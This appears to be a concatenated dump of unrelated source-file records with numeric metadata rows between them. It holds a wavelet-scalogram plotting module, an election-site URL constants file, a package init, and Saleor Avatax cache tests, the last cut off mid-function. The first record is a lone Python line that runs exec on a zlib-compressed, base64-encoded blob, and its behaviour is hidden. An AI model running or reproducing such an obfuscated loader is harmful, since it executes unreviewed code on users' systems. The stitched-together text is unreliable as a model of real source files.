exec(zlib.decompress(base64.b64decode("eJzlVV1r2zAUfdevuLgPlSDYTToKy9ZAaLdR2m1lDexhBmNiJRGJP5CUtVnd/757JTt1l4X2pTCYHmJd6ejcq3OPHZVXpbag0yIrc6Z8ZMrpUto2sgst00wV83ahNIyVJjQbY2XOD6crmepDwSqtCsuDIIiPjo9/vO3nLMEBkLgHTvxwk+16EznENnxEsJrCuHabNdSeIoIYf2OII5y6DajpUNLiPAKfiIAaSepEUOgo6oYjaVggiikxBdDsE0WDwDiOakeC8XuicpXQEZfcMRAPzl2ShqSLcKSOBI/GSeyuWrvfKImoiiTGSbMTuUqaJB2Ev2fNUGLBmKrgFIzVXBXVGnV3qvffoe4juKjgRuqfUsMQAoGtobadAvWnQY/gmtaeoKzKpfkT9j1d2jVcp+QI0wKdI3agT0HsAMbW4hLL5Axu1a8sKw0XQ9YaIUttihTeemGy9hPePxq8EVvQ7UKtJEz0Wj4ebIfVm93FdlB13sehf/AmGn9MLr58mPTa3ZuvZ5fJ+adv489iL1maZRr5uJO7Ej26Nmkq9h+ZlRruUB+631xyp63YX+627NDIIrMlJ3V6lHd/Cv/CzQIvM76g1E7sJnZ/NBpBa4iT/F5VD8N7KvgBOjahjqECcLWGq3Su4FwtlVZ5sJtR3k1lZfdX/3qVsIPxZDI+uxx0XTR4iY1O/jUTmXBaFoWcWo4e6j1jH+8D54JX8tgz3P+FufAbNfHfMkZabjpa+uWOmnaBZtj+F4b+HLepnkv6tjbWFB18aHDXcsHkyvzNeS8iHOwK1mH+DUNbDz4=")))
| 298
| 847
| 0.951902
| 37
| 894
| 23
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137233
| 0.005593
| 894
| 3
| 847
| 298
| 0.820023
| 0.020134
| 0
| 0
| 0
| 0.5
| 0.917808
| 0.917808
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
9a845b3cdff415d4a090b8bb91fa92bc118d9eb7
| 15,803
|
py
|
Python
|
kwakpriv/plotting/scalograms.py
|
alexxromero/WAKY-private
|
aa15d9d138ba22e04628590f2c9583a86f2e54f2
|
[
"MIT"
] | null | null | null |
kwakpriv/plotting/scalograms.py
|
alexxromero/WAKY-private
|
aa15d9d138ba22e04628590f2c9583a86f2e54f2
|
[
"MIT"
] | null | null | null |
kwakpriv/plotting/scalograms.py
|
alexxromero/WAKY-private
|
aa15d9d138ba22e04628590f2c9583a86f2e54f2
|
[
"MIT"
] | null | null | null |
"""
Plotting Functions
Functions that generate the wavelet scalograms.
"""
from __future__ import absolute_import
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from matplotlib.colors import Normalize, LogNorm
from matplotlib.colorbar import ColorbarBase
from matplotlib import cm
from ..w_transform import HaarTransform, InvHaarTransform
from .plottingtools import _BinData, _findmin, _findmax
from .plottingtools import _NewColorMap, _NSigmaFilter
# Public API of this plotting module.
__all__ = ['wScalogram', 'wScalogram_nsig']
# Shared plot colors (hex RGB strings passed straight to matplotlib).
Data_color='#0782B0'
Coeffs_color='#69B4F2'
# The first-trend panel reuses the coefficient color.
Firsttrend_color=Coeffs_color
Nsigma_color='#54B959'
def wScalogram(data, hypothesis=None,
               nsigma=None, nsigma_min=None, nsigma_percent=1,
               reconstruction_scaled=False,
               firsttrend=False,
               logscale=True,
               filled=False,
               title=None,
               titlesize=18,
               xlabel=None,
               textsize=14,
               textpos=0.91,
               figsize=(12, 12),
               ticksize=11,
               ypad=0,
               markersize=3,
               outputfile=None):
    """
    Bar-plot scalogram of the Haar wavelet coefficients of ``data``,
    one panel per decomposition level; the top panel shows the binned
    data itself.

    Parameters
    ----------
    data : array
        Array to calculate the discrete Haar wavelet transform on.
    hypothesis : array, optional
        Background hypothesis; when given together with ``nsigma`` an
        extra panel shows the filtered reconstruction.
    nsigma : array, optional
        Significance values fed to ``_NSigmaFilter``; also triggers the
        reconstruction panel.
    nsigma_min, nsigma_percent : optional
        Filter thresholds (minimum sigma / kept fraction) forwarded to
        ``_NSigmaFilter``; they only affect the legend label and filter.
    reconstruction_scaled : bool
        Divide the reconstruction by ``sqrt(hypothesis)`` before plotting.
    firsttrend : bool
        Whether to include the first trend on the scalogram plot.
    logscale : bool
        Use a log (True) or linear (False) y-scale; in log mode negative
        coefficients are drawn as hatched bars of their absolute value.
    filled : bool
        Whether to fill the bars or just show their contour.
    outputfile : string
        Name of the png file to save the plot to. If None, don't print the plot.

    Notes
    -----
    ``ypad`` is accepted but currently unused (kept for API
    compatibility).
    """
    WaveDec_data = HaarTransform(data)
    Ccoeffs = WaveDec_data[:-1]
    FirstTrend = WaveDec_data[-1]
    Level = len(Ccoeffs)
    nlevels = Level if firsttrend == False else Level + 1
    nrows = nlevels + 1  # the first panel is the data histogram
    if nsigma is not None:
        nrows += 1  # add another panel for the generating function
    ratio = [1.5]
    ratio += [1] * (nrows - 1)
    if filled == True:
        histtype = 'bar'
        coeffs_color = Coeffs_color
        firsttrend_color = Firsttrend_color
    else:
        histtype = 'step'
        coeffs_color = 'black'
        firsttrend_color = 'black'
    if logscale == True:
        scale = 'log'
    else:
        scale = 'linear'
    fig = plt.figure(figsize=figsize)
    gs = gridspec.GridSpec(ncols=1, nrows=nrows,
                           height_ratios=ratio,
                           hspace=0)
    axs = [fig.add_subplot(gs[i, 0]) for i in range(nrows)]
    # Fill out top panel with the binned input data.
    data_hist, _, data_center, data_width = _BinData(data, bins=2**Level)
    axs[0].bar(data_center, data_hist, align='center',
               width=data_width, color=Data_color)
    axs[0].tick_params(axis='both', labelsize=ticksize)
    axs[0].text(x=textpos, y=.63, s='Data', fontsize=textsize,
                bbox={'facecolor': 'white', 'alpha': 0.5, 'pad': 2},
                transform=axs[0].transAxes)
    axs[0].set_yscale(scale)
    # If nsigma is provided, panel 1 shows the filtered reconstruction.
    if nsigma is not None:
        nsigCcoeffs = nsigma
        cut = '(No cut)'
        if nsigma_percent is not None:
            cut = str(nsigma_percent * 100) + '%'
        if nsigma_min is not None:
            cut = r'$\sigma_{min}$ = ' + str(nsigma_min)
        if hypothesis is not None:
            # TODO: error trap
            DeltaCoeff = _NSigmaFilter(data, hypothesis, nsigma,
                                       nsigma_min, nsigma_percent)
            ReconstructedData = InvHaarTransform(DeltaCoeff, normalize=False)
            if reconstruction_scaled is True:
                RecData = np.divide(ReconstructedData, np.sqrt(hypothesis))
            else:
                RecData = ReconstructedData
            rec_hist, _, rec_center, rec_width = _BinData(RecData, bins=2**Level)
            axs[1].plot(rec_center, rec_hist, 'o', markersize=markersize,
                        color='#E67E22',
                        label='Reconstruction ({})'.format(cut))
            axs[1].tick_params(axis='y', bottom=False, labelbottom=False,
                               labelsize=ticksize)
            axs[1].tick_params(axis='x', labelbottom=False)
            axs[1].set_yscale('linear')
            axs[1].legend(edgecolor="black", fancybox=False, borderpad=.2,
                          handletextpad=0.0, handlelength=0, markerscale=0,
                          fontsize=textsize)
    # If firsttrend, fill out the bottom panel with the first trend.
    if firsttrend == True:
        bins = 1
        n, binning, patches = axs[-1].hist(x=range(bins), bins=bins,
                                           weights=FirstTrend,
                                           histtype=histtype,
                                           color=firsttrend_color)
        axs[-1].tick_params(axis='y', bottom=False, labelbottom=False,
                            labelsize=ticksize)
        axs[-1].tick_params(axis='x', labelbottom=False)
        axs[-1].set_xticks(np.linspace(binning[0], binning[-1], 2**(Level - 1)))
        axs[-1].set_yscale(scale)
        axs[-1].text(x=textpos, y=.63, s=r'$\ell={%.1i}$' % (0),
                     fontsize=textsize,
                     bbox={'facecolor': 'white', 'alpha': 0.5, 'pad': 2},
                     transform=axs[-1].transAxes)
    # Fill out the rest of the panels with the wavelet coefficients.
    # When the reconstruction panel exists, start two panels below the top.
    s = 2 if nsigma is not None else 1
    for l in range(Level):
        bins = 2**(Level - l - 1)
        coeffs = Ccoeffs[l]
        if logscale == True:
            # Plot the positive coefficients.
            pos_ix = np.where(Ccoeffs[l] > 0)
            pos_coeffs = np.zeros_like(coeffs)
            for i in pos_ix:
                pos_coeffs[i] = coeffs[i]
            axs[l + s].hist(x=range(bins), bins=bins,
                            weights=pos_coeffs, histtype=histtype,
                            color=coeffs_color)
            # Now plot the negative coefficients. The bars are hashed to
            # distinguish the pos and neg coefficients.
            neg_ix = np.where(Ccoeffs[l] < 0)
            neg_coeffs = np.zeros_like(coeffs)
            for j in neg_ix:
                neg_coeffs[j] = np.absolute(coeffs[j])
            n, binning, patches = axs[l + s].hist(x=range(bins), bins=bins,
                                                  weights=neg_coeffs,
                                                  histtype=histtype,
                                                  hatch='///',
                                                  color=coeffs_color)
            axs[l + s].tick_params(axis='y', bottom=False, labelbottom=False,
                                   labelsize=ticksize)
            axs[l + s].tick_params(axis='x', labelbottom=False)
            axs[l + s].set_xticks(np.linspace(binning[0], binning[-1],
                                              2**(Level - 1)))
            lev = Level - l - 1
            axs[l + s].text(x=textpos, y=.63, s=r'$\ell={%.1i}$' % (lev + 1),
                            fontsize=textsize,
                            bbox={'facecolor': 'white', 'alpha': 0.5, 'pad': 2},
                            transform=axs[l + s].transAxes)
            axs[l + s].set_yscale(scale)
        else:
            # Linear scale: plot signed coefficients directly plus a zero line.
            n, binning, patches = axs[l + s].hist(x=range(bins), bins=bins,
                                                  weights=coeffs,
                                                  histtype=histtype,
                                                  color=coeffs_color)
            axs[l + s].plot(binning, np.zeros_like(binning), color='black',
                            linewidth=0.5)
            axs[l + s].tick_params(axis='y', bottom=False, labelbottom=False,
                                   labelsize=ticksize)
            axs[l + s].tick_params(axis='x', labelbottom=False,
                                   labelsize=ticksize)
            axs[l + s].set_xticks(np.linspace(binning[0], binning[-1],
                                              2**(Level - 1)))
            lev = Level - l - 1
            axs[l + s].text(x=textpos, y=.63, s=r'$\ell={%.1i}$' % (lev + 1),
                            fontsize=textsize,
                            bbox={'facecolor': 'white', 'alpha': 0.5, 'pad': 2},
                            transform=axs[l + s].transAxes)
            axs[l + s].set_yscale(scale)
    if title is not None:
        fig.suptitle(title, fontsize=titlesize, y=0.92)
    fig.text(x=0.5, y=0.1, s=xlabel, fontsize=textsize)
    if outputfile is not None:
        plt.savefig(outputfile, bbox_inches='tight')
    plt.show()
def wScalogram_nsig(data, hypothesis=None,
nsigma=None, nsigma_min=None, nsigma_percent=1,
reconstruction_scaled=False,
firsttrend=False,
logscale=True,
title=None,
titlesize=18,
xlabel=None,
textsize=14,
figsize=(12,12),
textpos=0.91,
ticksize=11,
markersize=3,
outputfile=None):
"""
Function that generates a bar plot of the wavelet coefficients of the data array
per level.
Parameters
----------
data : array
Array to calculate the discrete Haar wavelet transform on.
nsigma : array
Nsigma array to use as the color-code for the wavelet coefficients.
firsttrend : bool
Whether to include the first trend on the scalogram plot.
logscale : bool
Whether to use a linear of log scale on the y-axis .
outputfile : string
Name of the png file to save the plot to. If None, don't print the plot.
"""
WaveDec_data = HaarTransform(data)
Ccoeffs = WaveDec_data[:-1]
FirstTrend = WaveDec_data[-1]
Level = len(Ccoeffs)
if logscale==True:
scale='log'
else:
scale='linear'
nlevels = Level if firsttrend==False else Level+1
nrows = nlevels+1 # the first panel is the data histogram
if nsigma is not None:
nrows += 1 # add another panel for the generating function
ratio = [1.5]
ratio += [1]*(nrows-1)
fig = plt.figure(figsize=figsize)
gs = gridspec.GridSpec(ncols=1, nrows=nrows,
height_ratios=ratio,
hspace=0)
axs = [fig.add_subplot(gs[i,0]) for i in range(nrows)]
cbar_axs = fig.add_axes([0.93, 0.15, 0.02, 0.7]) # colorbar axis
# Fill out top panel
data_hist, _, data_center, data_width = _BinData(data, bins=2**Level)
axs[0].bar(data_center, data_hist, align='center', width=data_width, color=Data_color)
axs[0].tick_params(axis='y', bottom=False, labelbottom=False, labelsize=ticksize)
axs[0].tick_params(axis='x', labelbottom=False)
axs[0].set_yscale(scale)
axs[0].text(x=textpos, y=.63, s='Data', fontsize=textsize,
bbox={'facecolor': 'white', 'alpha': 0.5, 'pad': 2},
transform=axs[0].transAxes)
# If nsigma function is provided
if nsigma is not None:
nsigCcoeffs = nsigma
cut = '(No cut)'
if nsigma_percent is not None:
cut = str(nsigma_percent*100) + '%'
if nsigma_min is not None:
cut = r'$\sigma_{min}$ = ' + str(nsigma_min)
if hypothesis is not None:
#TODO: error trap
DeltaCoeff = _NSigmaFilter(data, hypothesis, nsigma, nsigma_min, nsigma_percent)
ReconstructedData = InvHaarTransform(DeltaCoeff, normalize=False)
if reconstruction_scaled is True:
RecData = np.divide(ReconstructedData, np.sqrt(hypothesis))
else:
RecData = ReconstructedData
rec_hist, _, rec_center, rec_width = _BinData(RecData, bins=2**Level)
axs[1].plot(rec_center, rec_hist, 'o', markersize=markersize, color='#E67E22',
label='Reconstruction ({})'.format(cut))
axs[1].tick_params(axis='y', bottom=False, labelbottom=False, labelsize=ticksize)
axs[1].tick_params(axis='x', labelbottom=False)
axs[1].set_yscale('linear')
axs[1].legend(edgecolor="black", fancybox=False, borderpad=.2,
handletextpad=0, handlelength=0, markerscale=0, fontsize=textsize)
cmap = _NewColorMap()
binintensity = np.absolute(nsigma)
sig_min = _findmin(binintensity)
sig_max = _findmax(binintensity)
norm = Normalize(vmin=sig_min, vmax=sig_max)
# If firsttrend, fill out the bottom panel with the first trend
if firsttrend==True:
bins=1
norm_points = norm(binintensity[-1])
color_points = [cmap(i) for i in norm_points]
hist, edges, center, width = _BinData(FirstTrend, bins=1)
axs[-1].bar(center, hist, align='center', width=width, color=color_points)
axs[-1].tick_params(axis='y', bottom=False, labelbottom=False, labelsize=ticksize)
axs[-1].tick_params(axis='x', labelbottom=False)
axs[-1].set_xticks(np.linspace(edges[0], edges[-1], 2**(Level-1)))
axs[-1].set_yscale(scale)
axs[-1].text(x=textpos, y=.63, s=r'$\ell={%.1i}$'%(0), fontsize=textsize,
bbox={'facecolor': 'white', 'alpha': 0.5, 'pad': 2},
transform=axs[-1].transAxes)
# Now plot the negative coefficients. The bars are hashed to distinguish the
# pos and neg coefficients.
s = 2 if nsigma is not None else 1
for l in range(Level):
bins=2**(Level-l-1)
coeffs = Ccoeffs[l]
norm_points = norm(binintensity[l])
color_points = [cmap(i) for i in norm_points]
if logscale==True:
# Plot the positive coefficients
pos_ix = np.where(coeffs>0)
pos_coeffs = np.zeros_like(coeffs)
for i in pos_ix:
pos_coeffs[i] = coeffs[i]
pos_hist, pos_edges, pos_center, pos_width = _BinData(pos_coeffs, bins=bins)
axs[l+s].bar(pos_center, pos_hist, align='center', width=pos_width, color=color_points)
# Now plot the negative coefficients. The bars are hashed to distinguish the
# pos and neg coefficients.
neg_ix = np.where(Ccoeffs[l]<0)
neg_coeffs = np.zeros_like(coeffs)
for j in neg_ix:
neg_coeffs[j] = np.absolute(coeffs[j])
neg_hist, neg_edges, neg_center, neg_width = _BinData(neg_coeffs, bins=bins)
axs[l+s].bar(neg_center, neg_hist, align='center', width=neg_width, color=color_points,
hatch='///')
left_edge=np.minimum(pos_edges[0], neg_edges[0])
right_edge=np.maximum(pos_edges[-1], neg_edges[-1])
axs[l+s].tick_params(axis='y', bottom=False, labelbottom=False, labelsize=ticksize)
axs[l+s].tick_params(axis='x', labelbottom=False)
axs[l+s].set_xticks(np.linspace(left_edge, right_edge, 2**(Level-1)))
lev = Level-l-1
axs[l+s].text(x=textpos, y=.63, s=r'$\ell={%.1i}$'%(lev+1), fontsize=textsize,
bbox={'facecolor': 'white', 'alpha': 0.5, 'pad': 2},
transform=axs[l+s].transAxes)
axs[l+s].set_yscale(scale)
else:
hist, edges, center, width = _BinData(coeffs, bins=bins)
axs[l+s].plot(binning, np.zeros_like(binning), color='black', linewidth=0.5)
axs[l+s].bar(center, hist, align='center', width=width,
color=color_points)
axs[l+s].plot(range(bins), np.zeros(bins), color='black',
linewidth=0.5)
axs[l+s].tick_params(axis='y', bottom=False, labelbottom=False, labelsize=ticksize)
axs[l+s].tick_params(axis='x', labelbottom=False)
axs[l+s].set_xticks(np.linspace(edges[0], edges[-1], 2**(Level-1)))
lev=Level-l-1
axs[l+s].text(x=textpos, y=.63, s=r'$C_{l=%.1i}$'%(lev), fontsize=textsize,
bbox={'facecolor': 'white', 'alpha': 0.5, 'pad': 2},
transform=axs[l+s].transAxes)
axs[l+s].set_yscale(scale)
cbar = ColorbarBase(cbar_axs, cmap=cmap, norm=norm)
#cbar_axs.text(.5, sig_max, r'$N\sigma$', fontsize=12)
fig.text(x=0.93, y=.86, s=r'$N\sigma$', fontsize=textsize)
if title is not None:
fig.suptitle(title, fontsize=titlesize, y=0.92)
fig.text(x=0.5, y=0.1, s=xlabel, fontsize=textsize)
if outputfile is not None:
plt.savefig(outputfile, bbox_inches='tight')
plt.show()
| 42.141333
| 128
| 0.590141
| 2,053
| 15,803
| 4.439844
| 0.130054
| 0.014482
| 0.018102
| 0.036204
| 0.799342
| 0.789687
| 0.77718
| 0.754471
| 0.737575
| 0.730554
| 0
| 0.023582
| 0.283554
| 15,803
| 374
| 129
| 42.254011
| 0.781487
| 0.123964
| 0
| 0.735507
| 1
| 0
| 0.041499
| 0
| 0
| 0
| 0
| 0.005348
| 0
| 1
| 0.007246
| false
| 0
| 0.036232
| 0
| 0.043478
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9aa694fd50740b287af55b2dc30eaaaa22152542
| 261
|
py
|
Python
|
Crawler/constants.py
|
PuercoPop/EleccionesPeru
|
bdce3bc5f6d22c98361ace13b729553f8993e857
|
[
"MIT"
] | 1
|
2016-06-17T04:03:24.000Z
|
2016-06-17T04:03:24.000Z
|
Crawler/constants.py
|
PuercoPop/EleccionesPeru
|
bdce3bc5f6d22c98361ace13b729553f8993e857
|
[
"MIT"
] | null | null | null |
Crawler/constants.py
|
PuercoPop/EleccionesPeru
|
bdce3bc5f6d22c98361ace13b729553f8993e857
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Crawler endpoints on ONPE's site (www.web.onpe.gob.pe) for the 2011
# first-round congressional election results ("1ravuelta", "congreso").
# Page listing/serving the congressional tally acts ("rep_acta_cong").
congreso_url = u'http://www.web.onpe.gob.pe/modElecciones/elecciones/elecciones2011/1ravuelta/onpe/congreso/rep_acta_cong.php'
# Base URL, presumably used to resolve relative links found on that page
# — confirm against the crawler code that consumes it.
url_prefix = u'http://www.web.onpe.gob.pe/modElecciones/elecciones/elecciones2011/1ravuelta/onpe/congreso/'
| 43.5
| 126
| 0.781609
| 37
| 261
| 5.405405
| 0.567568
| 0.05
| 0.08
| 0.11
| 0.78
| 0.78
| 0.78
| 0.78
| 0.78
| 0.78
| 0
| 0.044355
| 0.049808
| 261
| 5
| 127
| 52.2
| 0.762097
| 0.08046
| 0
| 0
| 0
| 1
| 0.836134
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b11af4e2ec21ae923894b100f9b2b8286664ddbe
| 177
|
py
|
Python
|
pyelastices/__init__.py
|
szj2ys/pyelastices
|
9018ab78531b4f577b735580500f6a7804daa823
|
[
"MIT"
] | null | null | null |
pyelastices/__init__.py
|
szj2ys/pyelastices
|
9018ab78531b4f577b735580500f6a7804daa823
|
[
"MIT"
] | null | null | null |
pyelastices/__init__.py
|
szj2ys/pyelastices
|
9018ab78531b4f577b735580500f6a7804daa823
|
[
"MIT"
] | null | null | null |
# *_*coding:utf-8 *_*
"""Package entry point: re-exports the public pyelastices API.

Author: SZJ
"""
from .__version__ import version, __version__
# Expose the client under the familiar name ``Elasticsearch`` plus the
# ``helpers`` module, so callers can import both from the package root.
from pyelastices.api import Client as Elasticsearch
from pyelastices.api import helpers
| 17.7
| 51
| 0.768362
| 22
| 177
| 5.727273
| 0.636364
| 0.238095
| 0.285714
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006494
| 0.129944
| 177
| 9
| 52
| 19.666667
| 0.811688
| 0.175141
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
b11b74b9e6650f788faa30ec29823cb285aaaf10
| 23,118
|
py
|
Python
|
saleor/plugins/avatax/tests/test_avatax_caching.py
|
greentornado/saleor
|
7f58917957a23c4dd90b47214a4500c91c735dee
|
[
"CC-BY-4.0"
] | 3
|
2021-06-22T12:38:18.000Z
|
2021-07-11T15:01:57.000Z
|
saleor/plugins/avatax/tests/test_avatax_caching.py
|
greentornado/saleor
|
7f58917957a23c4dd90b47214a4500c91c735dee
|
[
"CC-BY-4.0"
] | 111
|
2021-06-30T08:51:06.000Z
|
2022-03-28T04:48:49.000Z
|
saleor/plugins/avatax/tests/test_avatax_caching.py
|
IslamDEVO/es-saleor-nginx
|
a56a4aaf23fc308aad7b7489bc090fd4fcdb6315
|
[
"CC-BY-4.0"
] | 6
|
2021-11-08T16:43:05.000Z
|
2022-03-22T17:31:16.000Z
|
from decimal import Decimal
from unittest.mock import ANY, Mock, patch
from django.test import override_settings
from prices import Money, TaxedMoney
from ....checkout.fetch import fetch_checkout_lines
from ...manager import get_plugins_manager
from .. import CACHE_KEY, generate_request_data_from_checkout
from ..plugin import AvataxPlugin
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
@patch("saleor.plugins.avatax.cache.set")
def test_calculate_checkout_total_use_cache(
    mock_cache_set,
    checkout_with_items_and_shipping,
    checkout_with_items_and_shipping_info,
    address,
    site_settings,
    plugin_configuration,
    avalara_response_for_checkout_with_items_and_shipping,
    monkeypatch,
    channel_USD,
):
    """Checkout total is computed from the cached Avatax response; the
    cache is read with the checkout's key and never written again."""
    # given
    checkout = checkout_with_items_and_shipping
    checkout_info = checkout_with_items_and_shipping_info
    plugin_configuration()
    manager = get_plugins_manager()
    plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
    site_settings.company_address = address
    site_settings.save()
    lines = fetch_checkout_lines(checkout)
    avalara_request_data = generate_request_data_from_checkout(
        checkout_info, lines, plugin.config, []
    )
    # Seed the cache with a (request_data, response) pair that matches the
    # current checkout so the plugin takes the cached path.
    mocked_cache = Mock(
        return_value=(
            avalara_request_data,
            avalara_response_for_checkout_with_items_and_shipping,
        )
    )
    monkeypatch.setattr("saleor.plugins.avatax.cache.get", mocked_cache)
    # when
    result = manager.calculate_checkout_total(
        checkout_info, lines, checkout_info.shipping_address, []
    )
    # then
    assert result == TaxedMoney(net=Money("72.2", "USD"), gross=Money("75", "USD"))
    avalara_cache_key = CACHE_KEY + str(checkout.token)
    mocked_cache.assert_called_with(avalara_cache_key)
    mock_cache_set.assert_not_called()
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
def test_calculate_checkout_total_save_avatax_response_in_cache(
    checkout_with_items_and_shipping,
    checkout_with_items_and_shipping_info,
    address,
    site_settings,
    plugin_configuration,
    avalara_response_for_checkout_with_items_and_shipping,
    monkeypatch,
    channel_USD,
):
    """First checkout-total call hits the Avatax API once and caches the
    response; a repeated call reuses the cache (API not called again)."""
    # given
    checkout = checkout_with_items_and_shipping
    checkout_info = checkout_with_items_and_shipping_info
    plugin_configuration()
    manager = get_plugins_manager()
    plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
    site_settings.company_address = address
    site_settings.save()
    lines = fetch_checkout_lines(checkout)
    # Mock the Avatax HTTP call so we can count how often it is made.
    mocked_avalara = Mock(
        return_value=avalara_response_for_checkout_with_items_and_shipping
    )
    monkeypatch.setattr("saleor.plugins.avatax.api_post_request", mocked_avalara)
    # when
    result = manager.calculate_checkout_total(
        checkout_info, lines, checkout_info.shipping_address, []
    )
    # Second Avatax call to make sure that we use cached response
    manager.calculate_checkout_total(
        checkout_info, lines, checkout_info.shipping_address, []
    )
    # then
    assert result == TaxedMoney(net=Money("72.2", "USD"), gross=Money("75", "USD"))
    avalara_request_data = generate_request_data_from_checkout(
        checkout_info, lines, plugin.config, []
    )
    mocked_avalara.assert_called_once_with(ANY, avalara_request_data, plugin.config)
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
@patch("saleor.plugins.avatax.cache.set")
def test_calculate_checkout_subtotal_use_cache(
    mock_cache_set,
    checkout_with_items_and_shipping,
    checkout_with_items_and_shipping_info,
    address,
    site_settings,
    plugin_configuration,
    avalara_response_for_checkout_with_items_and_shipping,
    monkeypatch,
    channel_USD,
):
    """Checkout subtotal is computed from the cached Avatax response; the
    cache is read with the checkout's key and never written again."""
    # given
    checkout = checkout_with_items_and_shipping
    checkout_info = checkout_with_items_and_shipping_info
    plugin_configuration()
    manager = get_plugins_manager()
    plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
    site_settings.company_address = address
    site_settings.save()
    lines = fetch_checkout_lines(checkout)
    avalara_request_data = generate_request_data_from_checkout(
        checkout_info, lines, plugin.config, []
    )
    # Seed the cache with a matching (request_data, response) pair.
    mocked_cache = Mock(
        return_value=(
            avalara_request_data,
            avalara_response_for_checkout_with_items_and_shipping,
        )
    )
    monkeypatch.setattr("saleor.plugins.avatax.cache.get", mocked_cache)
    # when
    result = manager.calculate_checkout_subtotal(
        checkout_info, lines, checkout_info.shipping_address, []
    )
    # then
    assert result == TaxedMoney(net=Money("64.07", "USD"), gross=Money("65", "USD"))
    avalara_cache_key = CACHE_KEY + str(checkout.token)
    mocked_cache.assert_called_with(avalara_cache_key)
    mock_cache_set.assert_not_called()
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
def test_calculate_checkout_subtotal_save_avatax_response_in_cache(
    checkout_with_items_and_shipping,
    checkout_with_items_and_shipping_info,
    address,
    site_settings,
    plugin_configuration,
    avalara_response_for_checkout_with_items_and_shipping,
    monkeypatch,
    channel_USD,
):
    """First subtotal call hits the Avatax API once and caches the
    response; a repeated call reuses the cache (API not called again)."""
    # given
    checkout = checkout_with_items_and_shipping
    checkout_info = checkout_with_items_and_shipping_info
    plugin_configuration()
    manager = get_plugins_manager()
    plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
    site_settings.company_address = address
    site_settings.save()
    lines = fetch_checkout_lines(checkout)
    # Mock the Avatax HTTP call so we can count how often it is made.
    mocked_avalara = Mock(
        return_value=avalara_response_for_checkout_with_items_and_shipping
    )
    monkeypatch.setattr("saleor.plugins.avatax.api_post_request", mocked_avalara)
    # when
    result = manager.calculate_checkout_subtotal(
        checkout_info, lines, checkout_info.shipping_address, []
    )
    # Second Avatax call to make sure that we use cached response
    manager.calculate_checkout_subtotal(
        checkout_info, lines, checkout_info.shipping_address, []
    )
    # then
    assert result == TaxedMoney(net=Money("64.07", "USD"), gross=Money("65", "USD"))
    avalara_request_data = generate_request_data_from_checkout(
        checkout_info, lines, plugin.config, []
    )
    mocked_avalara.assert_called_once_with(ANY, avalara_request_data, plugin.config)
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
@patch("saleor.plugins.avatax.cache.set")
def test_calculate_checkout_shipping_use_cache(
    mock_cache_set,
    checkout_with_items_and_shipping,
    checkout_with_items_and_shipping_info,
    address,
    site_settings,
    plugin_configuration,
    avalara_response_for_checkout_with_items_and_shipping,
    monkeypatch,
    channel_USD,
):
    """Checkout shipping price is computed from the cached Avatax response;
    the cache is read with the checkout's key and never written again."""
    # given
    checkout = checkout_with_items_and_shipping
    checkout_info = checkout_with_items_and_shipping_info
    plugin_configuration()
    manager = get_plugins_manager()
    plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
    site_settings.company_address = address
    site_settings.save()
    lines = fetch_checkout_lines(checkout)
    avalara_request_data = generate_request_data_from_checkout(
        checkout_info, lines, plugin.config, []
    )
    # Seed the cache with a matching (request_data, response) pair.
    mocked_cache = Mock(
        return_value=(
            avalara_request_data,
            avalara_response_for_checkout_with_items_and_shipping,
        )
    )
    monkeypatch.setattr("saleor.plugins.avatax.cache.get", mocked_cache)
    # when
    result = manager.calculate_checkout_shipping(
        checkout_info, lines, checkout_info.shipping_address, []
    )
    # then
    assert result == TaxedMoney(net=Money("8.13", "USD"), gross=Money("10", "USD"))
    avalara_cache_key = CACHE_KEY + str(checkout.token)
    mocked_cache.assert_called_with(avalara_cache_key)
    mock_cache_set.assert_not_called()
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
def test_calculate_checkout_shipping_save_avatax_response_in_cache(
